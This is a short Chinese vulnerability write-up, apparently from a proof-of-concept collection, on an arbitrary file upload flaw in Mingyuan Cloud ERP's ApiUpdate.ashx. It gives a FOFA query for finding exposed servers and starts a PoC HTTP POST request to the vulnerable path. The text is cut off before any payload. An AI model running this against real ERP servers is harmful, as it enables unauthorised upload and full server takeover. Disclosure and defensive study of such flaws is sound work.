0x01 产品简介
明源云ERP系统接口管家是明源云ERP提供的一个功能,用于管理和处理系统与外部系统之间的接口集成。它充当了ERP系统与其他应用程序、第三方系统或服务之间的桥梁,负责数据的传输、交换和同步。通过接口管家,用户可以配置和管理不同接口的参数、调度和监控接口执行情况,以确保系统之间的数据交流和协同工作的顺畅运行。接口管家通常提供了一些常见的接口类型,如文件接口、Web服务接口、数据库接口等,以满足不同系统集成的需求。它可以处理数据的转换、验证和映射,确保数据的准确性和一致性。此外,接口管家还提供了日志记录和错误处理机制,以便及时发现和解决接口传输或处理中的问题。
0x02 漏洞概述
明源云 ERP系统接口管家 ApiUpdate.ashx 文件存在任意文件上传漏洞,攻击者通过构造特殊的ZIP压缩包可以上传任意文件,进而控制整个服务器。
0x03 影响范围
明源云ERP <= 4.5
0x04 复现环境
FOFA:body="接口管家站点正常!"
0x05 漏洞复现
PoC
POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) V